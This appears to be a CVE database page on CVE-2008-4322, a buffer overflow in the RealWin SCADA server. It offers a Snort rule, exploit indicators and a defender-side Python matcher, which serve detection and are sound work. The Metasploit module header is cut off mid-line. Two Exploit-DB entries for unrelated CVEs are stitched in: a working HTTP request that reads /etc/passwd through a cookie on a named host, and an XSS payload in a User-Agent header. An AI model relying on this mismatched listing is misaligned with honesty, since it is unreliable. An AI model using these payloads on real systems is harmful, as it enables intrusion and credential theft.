CVE-2008-4322
Published: 2008-09-29
Priority: P269 · Severity: critical · CVSS 2.0 base score: 10
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C (network, low complexity, no authentication, complete confidentiality/integrity/availability impact)
Exploit: public exploit available (see the Exploit-DB and Metasploit entries below)
EPSS: 64.83% (99.1th percentile)
Stack-based buffer overflow in RealFlex Technologies Ltd. RealWin Server 2.0, as distributed by DATAC, allows remote attackers to execute arbitrary code via a crafted FC_INFOTAG/SET_CONTROL packet.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| realflex_technologies_ltd | realwin_server | — | — |
Detection & IOCs (extracted from the sources below)
Byte pattern: |10 23 54 67 00 08 00 00| (FC_INFOTAG magic header, offset 0)
Byte pattern: |e3 77 0a 00 05 00 04 00 00 00| (SET_CONTROL tag, immediately following the header)
Snort/Suricata rule (sid:2012096, rev:2):
alert tcp $EXTERNAL_NET any -> $HOME_NET 910 (msg:"ET SCADA DATAC RealWin SCADA Server Buffer Overflow"; flow:established,to_server; content:"|10 23 54 67 00 08 00 00|"; depth:8; content:"|e3 77 0a 00 05 00 04 00 00 00|"; within:10; isdataat:744,relative; content:!"|0a|"; within:744; reference:url,www.securityfocus.com/bid/31418; reference:cve,2008-4322; reference:url,secunia.com/advisories/32055; classtype:attempted-user; sid:2012096; rev:2; metadata:created_at 2010_12_23, cve CVE_2008_4322, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_08_19;)
- The exploit packet targets TCP port 910 (the RealWin SCADA Server default port); monitor for inbound connections from external hosts to this port.
- The malicious FC_INFOTAG/SET_CONTROL packet begins with the 8-byte magic header 10 23 54 67 00 08 00 00 at depth 0, followed within 10 bytes by e3 77 0a 00 05 00 04 00 00 00; both patterns must be present to confirm an exploit attempt.
- After the second content match, the exploit payload spans at least 744 bytes and must not contain a 0x0a (newline) byte within that range; use isdataat:744,relative together with content:!"|0a|"; within:744 to confirm an overflow-sized payload free of that bad character.
- The exploit avoids the bad characters \x00\x20\x0a\x0d; shellcode in observed traffic will not contain these bytes, which can help distinguish exploit payloads from benign data.
- The return address used in the Universal target is 0x4001e2a9; the presence of this 4-byte little-endian value (a9 e2 01 40) at offset 740 within the packet body is a strong indicator of this specific exploit module.
- The Metasploit module specifically targets RealWin SCADA Server 2.0 Build 6.0.10.37; the hardcoded return address 0x4001e2a9 and offset 740 are version-specific and may not apply to other builds.
- Payload space is constrained to 550 bytes with a stack adjustment of -3500; detection rules and shellcode scanners should account for this relatively small payload window.
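The following Python is an added, defender-side example for this page, not code from Emerging Threats, Proofpoint, DATAC or the Metasploit project. It re-implements the matching conditions of sid:2012096 (port 910, client-to-server, the two byte patterns, the 744-byte window with no 0x0a) so that a captured TCP payload can be checked offline and the reason for a non-match is explained; the sample payloads and flow records are constructed filler bytes, not real traffic.

```python
"""
Offline re-implementation of the matching conditions in ET rule sid:2012096
(CVE-2008-4322). Added example for this page; not code from Emerging Threats,
Proofpoint, DATAC or the Metasploit project. Sample data below is constructed.
"""
from dataclasses import dataclass
from typing import Iterable

# Byte patterns and sizes taken verbatim from the rule.
MAGIC_HEADER = bytes.fromhex("10 23 54 67 00 08 00 00")           # content #1, depth:8
SET_CONTROL_TAG = bytes.fromhex("e3 77 0a 00 05 00 04 00 00 00")  # content #2, within:10
OVERFLOW_SPAN = 744   # isdataat:744,relative and content:!"|0a|"; within:744
REALWIN_PORT = 910    # $HOME_NET 910 with flow:established,to_server


@dataclass(frozen=True)
class Verdict:
    matched: bool
    reason: str


def check_realwin_payload(payload: bytes) -> Verdict:
    """Apply the rule's content tests to one client-to-server TCP payload."""
    # content:"|10 23 54 67 00 08 00 00|"; depth:8
    # depth:8 with an 8-byte pattern means the header must sit at offset 0.
    if payload[:8] != MAGIC_HEADER:
        return Verdict(False, "no FC_INFOTAG magic header at offset 0")

    # content:"|e3 77 0a 00 05 00 04 00 00 00|"; within:10
    # A 10-byte pattern that must fit in the next 10 bytes can only be at offset 8.
    if payload[8:18] != SET_CONTROL_TAG:
        return Verdict(False, "no SET_CONTROL tag following the header")

    body = payload[18:]
    # isdataat:744,relative -> the payload must continue for at least 744 bytes
    if len(body) < OVERFLOW_SPAN:
        return Verdict(False, f"body is {len(body)} bytes, below the overflow size")

    # content:!"|0a|"; within:744 -> no newline anywhere in that window
    if b"\x0a" in body[:OVERFLOW_SPAN]:
        return Verdict(False, "0x0a inside the 744-byte window (a bad character for this exploit)")

    return Verdict(True, "oversized SET_CONTROL body without 0x0a: matches sid:2012096")


def scan_flows(flows: Iterable[dict]) -> list:
    """Apply the rule header (port 910, to_server) and then the payload tests."""
    alerts = []
    for flow in flows:
        if flow["dst_port"] != REALWIN_PORT or flow["direction"] != "to_server":
            continue
        verdict = check_realwin_payload(flow["payload"])
        if verdict.matched:
            alerts.append({"src": flow["src"], "reason": verdict.reason})
    return alerts


# Constructed sample payloads (filler bytes, not captured traffic).
SAMPLE_BENIGN = MAGIC_HEADER + SET_CONTROL_TAG + b"tag=1;value=42"
SAMPLE_EXPLOIT_SIZED = MAGIC_HEADER + SET_CONTROL_TAG + b"A" * 760
SAMPLE_WITH_NEWLINE = MAGIC_HEADER + SET_CONTROL_TAG + b"A" * 100 + b"\n" + b"A" * 660

# Constructed flow records; only the second one should alert.
SAMPLE_FLOWS = [
    {"src": "192.0.2.10", "dst_port": 910, "direction": "to_server", "payload": SAMPLE_BENIGN},
    {"src": "198.51.100.7", "dst_port": 910, "direction": "to_server", "payload": SAMPLE_EXPLOIT_SIZED},
    {"src": "203.0.113.5", "dst_port": 910, "direction": "to_client", "payload": SAMPLE_EXPLOIT_SIZED},
    {"src": "192.0.2.44", "dst_port": 8080, "direction": "to_server", "payload": SAMPLE_EXPLOIT_SIZED},
    {"src": "192.0.2.45", "dst_port": 910, "direction": "to_server", "payload": SAMPLE_WITH_NEWLINE},
]

if __name__ == "__main__":
    for alert in scan_flows(SAMPLE_FLOWS):
        print(alert)
```

Running the block prints one alert, for the flow from 198.51.100.7; the server-to-client copy, the copy on port 8080 and the payload containing a newline are all rejected for the reasons the rule encodes, which is useful when tuning the rule against legitimate SET_CONTROL traffic on a site's own network.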
Suricata
ET SCADA DATAC RealWin SCADA Server Buffer Overflow (suricata · 2010-12-23 · CVE-2008-4322)
Rule: sid:2012096, rev:2, quoted in full under Detection & IOCs above.
Exploit-DB
DATAC RealWin SCADA Server - Remote Buffer Overflow (Metasploit) (exploitdb · 2010-05-09 · CVE-2008-4322)
---
##
# $Id: realwin.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
    # [the lines between the class declaration and the 'Name' key were lost when the page was extracted]
            'Name'           => 'DATAC RealWin SCADA Server Buffer Overflow',
            'Description'    => %q{
                    This module exploits a stack buffer overflow in DATAC Control
                International RealWin SCADA Server 2.0 (Build 6.0.10.37).
                By sending a specially crafted FC_INFOTAG/SET_CONTROL packet,
                an attacker may be able to execute arbitrary code.
            },
            'Author'         => [ 'MC' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision:
Exploit-DB
CMS Made Simple 1.4.1 - Local File Inclusion (exploitdb · 2008-11-29 · CVE-2008-5642)
---
Type: Directory Traversal vulnerability (Unix tested) / Root privileges escalation
Vendor: CMS Made Simple
Software: CMS Made Simple 1.4.1 "Spring Garden" (and probably others ...)
Author: M4ck-h@cK
Date 29.11.2008
Home: sweet home
contact: no, thx :)
Exploit:
Demo: on h[ttp://demo.cmsmadesimple.fr/admin/]
GET http://demo.cmsmadesimple.fr/admin/login.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: demo.cmsmadesimple.fr
Cookie: cms_language=../../../../../../../../etc/passwd%00.html;cms_admin_user_id=1
Connection: Close
Pragma: no-cache
It's possible to set "cms_language" value in order to view /etc/passwd file.
# milw0rm.com [2008-11-29]
Exploit-DB
Liferay Enterprise Portal 4.3.6 - User-Agent HTTP Header Cross-Site Scripting (exploitdb · 2008-01-31 · CVE-2008-0178)
---
source: https://www.securityfocus.com/bid/27547/info
Liferay Enterprise Portal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects Liferay Enterprise Portal 4.3.6.
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)<script>alert('XSS !!!')</script>
Metasploit
DATAC RealWin SCADA Server Buffer Overflow (metasploit)
This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.0 (Build 6.0.10.37). By sending a specially crafted FC_INFOTAG/SET_CONTROL packet, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
References:
- http://reversemode.com/index.php?option=com_content&task=view&id=55&Itemid=1
- http://secunia.com/advisories/32055
- http://www.kb.cert.org/vuls/id/976484
- http://www.securityfocus.com/archive/1/496759/100/0/threaded
- http://www.securityfocus.com/bid/31418
- http://www.vupen.com/english/advisories/2008/2694
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45465